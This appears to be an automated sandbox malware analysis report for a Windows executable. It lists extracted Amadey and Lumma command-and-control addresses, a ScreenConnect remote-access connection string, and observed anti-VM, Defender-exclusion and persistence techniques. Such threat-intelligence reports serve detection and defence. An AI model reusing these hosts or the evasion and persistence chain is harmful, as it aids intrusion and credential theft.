Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-12-2024 02:13
Static task
static1
Behavioral task
behavioral1
Sample
055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
Resource
win10v2004-20241007-en
General
-
Target
055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe
-
Size
2.8MB
-
MD5
8cbe0ced0c0f7bfbdf19128ba80adb99
-
SHA1
15e615a0fe64fe5200dd916232d9bc26b1c3d815
-
SHA256
055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895
-
SHA512
4b258260770b08fdd8f14b7bf0e703b8ca5010e4698e457bc0cfc76c246fb9e7c60ee4d2068b717f8205c2c1954d3b6b8742ed2547b67082f5b89c63d850e938
-
SSDEEP
49152:kNv6yZz1fXBB9nu/SkIK3OdW+56W0xSDmoJb3:s6yZz1fRB9nu/SkIK3ibpDmA
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://sordid-snaked.cyou/api
https://awake-weaves.cyou/api
https://wrathful-jammy.cyou/api
https://debonairnukk.xyz/api
https://diffuculttan.xyz/api
https://effecterectz.xyz/api
https://deafeninggeh.biz/api
https://immureprech.biz/api
Signatures
-
Amadey family
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral2/files/0x0009000000023bd3-210.dat family_vidar_v7 behavioral2/memory/2904-213-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 behavioral2/memory/2904-636-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 -
Lumma family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 3940 created 3448 3940 UZAj8wc.exe 56 PID 1540 created 2664 1540 4913480162.exe 44 -
Vidar family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF c59adc6d69.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c59adc6d69.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7796213aa8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4ba8da5cdc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4913480162.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3573f91eb8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 68c2153f03.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 804 powershell.exe 1936 powershell.exe 5448 powershell.exe 5148 powershell.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (98a59bd0eed9222b)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=gips620.top&p=8880&s=61f772e9-8983-4fd3-833d-601341ed72a3&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAppIU89Zza02FmB%2bI4UVSKwAAAAACAAAAAAAQZgAAAAEAACAAAAD0HYLpxhyUiuUgZc9K3eAFstaQGhECrzr15py9%2bE4Q7gAAAAAOgAAAAAIAACAAAABgNjLYlNzwEixn6nC37WgkxmUNWxnL1w%2bPXSDDx623AqAEAAA6Vybka4ukU1jsHkHHu%2fdkLGtik%2fBdkBRjF4dkzWZ9nXgRQ40Mh2%2f8VwYXwcx2UdC5eJVvagFX9WvftF0z8WoowTfcJXCG0dt8HPx%2b%2fQOZ%2f%2fWIIksWhtUAJk1YQAFzQAHuNPfmq1iZWlMTCydMFD5FCApLrjotDbJv6mxrisb17re2qb4tjejGJ2piIX2%2bacdoQuPDF3qCFo%2fNG2uIkVvdVGT1ncvIaLruHi9U6n2PaUotPra3nGCS82EA4PZ%2fvTxmwIYYZhZqnihhpUdLRPm4mNLn9Pah%2fxFveuVlvw6eSkNvAhYYoVbLXngW0TqdM0SbNINIKo2C6tUkCbvcqA9hlO8J9YQ4AZL4B1Du1dlzWaGZ2r9WdbgjnSi2xtyVUAYLkd85aGnJSgzxakQWdocl906sFCr8GWpWGXaydnH%2babSQgOfFeUOaAiR1wfvaWqSBZMqR2UEpUiNtPrlsM5BNfuW9izu3bDjSdCeBhOB0%2bO0y%2brTtD01W0ZEKuEl0odsF6PEW4DeDS5MM0YM%2bwzAS2tk9ZXAx%2bwBKUbBbFQem2GLnB6tTMxOZvfF8L3W5jhBInNcMUEdhmO5TnqYpPW16GUpaBV98US5Fkr8KKnLMXyzlcNSuOGL0dg7BcTmqVWwOd6fUoXonE0JjfkND3AGeDo8UqAw0BGn%2bzbfbFzoNO2BX3ZwEYPWhgSt5bRjBZFIPhnAroFx84u2E1ROAWg%2b09zAMn2jCNnzzi5XJwJeL9d2%2f7AM5t4MpreszRJMsX%2bPZ%2bIm59xeR5aELsFhicczvKaBhskKv0%2bGlhimpGQvRZ0RTQxZqRxTYctqPhrV3C%2bHuD%2bisps09DyHXYAG75wF8rX2wIiv4mbBORAJitP%2bry%2bqU%2boZnf521%2fk0jJEisXqfI%2f1z6i8uuDg4V0aghPXIpQTqUFkfkIf7TlE95S666vEuCBAdL3Ay1qqtE82BcoPRU%2fZy7MPKpU4DlzhF%2bEUGB%2fTmbsY%2ft5TFl01X1ynzTrtqdb5uysuTEDGvCRB9VdxrE0c6oWt9O4jtlPY88k2oZcxU1NX7snQLY5AJpHiAncxLikBB9MgwbvnaeUCdWFMrZs1byvmrM9bA7fd4ki%2fs4S1WTV5F7X0ZP0tuhi5w9FOIT9CCR%2f%2fxrEVAf2qorH%2b1N62ZBAO6XF7PoCeJtYMSA4FbR3r9AD%2f9W4Wq66gxUkvNUWtMvGc6pVu59NUwGwGbIJ12lYwjlI5QqYwr6cT9MEA%2fZ4eWde6MLc%2bLF17i8TFRTAmso4PApgAMyqLPBrDHxMZ3B9S8JxiUF1Mv00nRTdWhwCh0opcdQiulX%2fFL2EISDhuzPW9NuPiOIQlFbAD1Wbn5LR7iMoxBds%2fBiHRcW0fRfTFEEnsRfV0PiAvwqHrw582ilks7XYjNJbnruJ4T1jiv6%2b0PXCCSxoketZ%2bTH%2fnET7WlqWFKF1ky%2bT%2bdB5L5BqRuld6kV5%2biPlgleHRYqO%2fhs1vVAtaNUIQlUqQjlYgfUNtDG5wSJqT%2bCkoF3L%2fzJf6FVnZDYsBKaUtsoDQwDcn0jdDTaIjf%2bTnZ7IHx8Hi8HKo65JSEOgjnMdPWPwEAAAABLW%2b8AUkwM943pQU6LOcE6Zg02w3QfQOH0mo9j2b20fDb6Uk3pXq%2f%2boMf6AV6Di1sCogjhTYR0M6wgFCHnBD33&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7796213aa8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3573f91eb8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 68c2153f03.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4ba8da5cdc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4913480162.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c59adc6d69.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 68c2153f03.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4ba8da5cdc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4913480162.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7796213aa8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3573f91eb8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c59adc6d69.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation b2b654d781.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation ga70pjP.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation NN9Dd7c.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation cfe32a70b98540d9861909672f4b70a8.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 4b8d248ac5a44344a64afd9f747a9e45.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation UZAj8wc.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 804a4385fd.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation skotes.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ApproximateSize.vbs UZAj8wc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIRUS101RatPayload.lnk InstallUtil.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIRUS101RatPayload.lnk InstallUtil.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 42 IoCs
pid Process 4612 skotes.exe 4028 NN9Dd7c.exe 1684 ga70pjP.exe 4848 INOKWGC.exe 2904 4b8d248ac5a44344a64afd9f747a9e45.exe 5052 cfe32a70b98540d9861909672f4b70a8.exe 1784 8ZVMneG.exe 656 8ZVMneG.exe 540 8ZVMneG.exe 3940 UZAj8wc.exe 6672 skotes.exe 5764 ScreenConnect.ClientService.exe 6240 ScreenConnect.WindowsClient.exe 6584 ScreenConnect.WindowsClient.exe 6868 7796213aa8.exe 5960 c7ac8b2876.exe 6444 c7ac8b2876.exe 3220 4ba8da5cdc.exe 3148 c1e8d0e648.exe 6680 3573f91eb8.exe 3760 c1e8d0e648.exe 1540 4913480162.exe 6460 skotes.exe 3508 804a4385fd.exe 5200 057af55804f941a1bfb3623a361b7ab9.exe 5300 b2b654d781.exe 1432 7z.exe 5256 7z.exe 2372 7z.exe 656 7z.exe 5244 7z.exe 6732 7z.exe 4360 7z.exe 6072 7z.exe 5940 in.exe 5416 c59adc6d69.exe 6164 68c2153f03.exe 7100 47493c571e.exe 6020 47493c571e.exe 924 6c81dae2fe.exe 5816 skotes.exe 5840 Intel_PTT_EK_Recertification.exe -
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine c59adc6d69.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 7796213aa8.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 4ba8da5cdc.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 3573f91eb8.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 4913480162.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 68c2153f03.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe -
Loads dropped DLL 30 IoCs
pid Process 4916 MsiExec.exe 1460 rundll32.exe 1460 rundll32.exe 1460 rundll32.exe 1460 rundll32.exe 1460 rundll32.exe 1460 rundll32.exe 1460 rundll32.exe 1460 rundll32.exe 1460 rundll32.exe 2412 MsiExec.exe 5844 MsiExec.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 1432 7z.exe 5256 7z.exe 2372 7z.exe 656 7z.exe 5244 7z.exe 6732 7z.exe 4360 7z.exe 6072 7z.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7796213aa8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1018024001\\7796213aa8.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 22 raw.githubusercontent.com 23 raw.githubusercontent.com 24 raw.githubusercontent.com 209 raw.githubusercontent.com -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390038006100350039006200640030006500650064003900320032003200620029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\ezo4bdgt.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\ezo4bdgt.newcfg ScreenConnect.ClientService.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
pid Process 1868 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe 4612 skotes.exe 6672 skotes.exe 6868 7796213aa8.exe 3220 4ba8da5cdc.exe 6680 3573f91eb8.exe 1540 4913480162.exe 6460 skotes.exe 5200 057af55804f941a1bfb3623a361b7ab9.exe 5200 057af55804f941a1bfb3623a361b7ab9.exe 5416 c59adc6d69.exe 6164 68c2153f03.exe 5816 skotes.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1784 set thread context of 656 1784 8ZVMneG.exe 110 PID 3940 set thread context of 5544 3940 UZAj8wc.exe 148 PID 5960 set thread context of 6444 5960 c7ac8b2876.exe 151 PID 3148 set thread context of 3760 3148 c1e8d0e648.exe 158 PID 7100 set thread context of 6020 7100 47493c571e.exe 198 PID 5840 set thread context of 5612 5840 Intel_PTT_EK_Recertification.exe 203 -
Drops file in Program Files directory 19 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.resources msiexec.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI3E3.tmp msiexec.exe File created C:\Windows\Installer\e58028d.msi msiexec.exe File created C:\Windows\Tasks\skotes.job 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe File opened for modification C:\Windows\Installer\e58028b.msi msiexec.exe File created C:\Windows\Installer\wix{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}.SchedServiceConfig.rmi MsiExec.exe File opened for modification C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI461.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD} msiexec.exe File opened for modification C:\Windows\Installer\MSI5D9.tmp msiexec.exe File created C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon msiexec.exe File created C:\Windows\Installer\e58028b.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 6816 6680 WerFault.exe 154 7068 1540 WerFault.exe 159 -
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ga70pjP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4b8d248ac5a44344a64afd9f747a9e45.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3573f91eb8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c1e8d0e648.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4913480162.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language INOKWGC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4ba8da5cdc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 47493c571e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NN9Dd7c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c7ac8b2876.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c7ac8b2876.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c1e8d0e648.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 804a4385fd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7796213aa8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 057af55804f941a1bfb3623a361b7ab9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b2b654d781.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 47493c571e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8ZVMneG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6c81dae2fe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8ZVMneG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c59adc6d69.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 68c2153f03.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZAj8wc.exe -
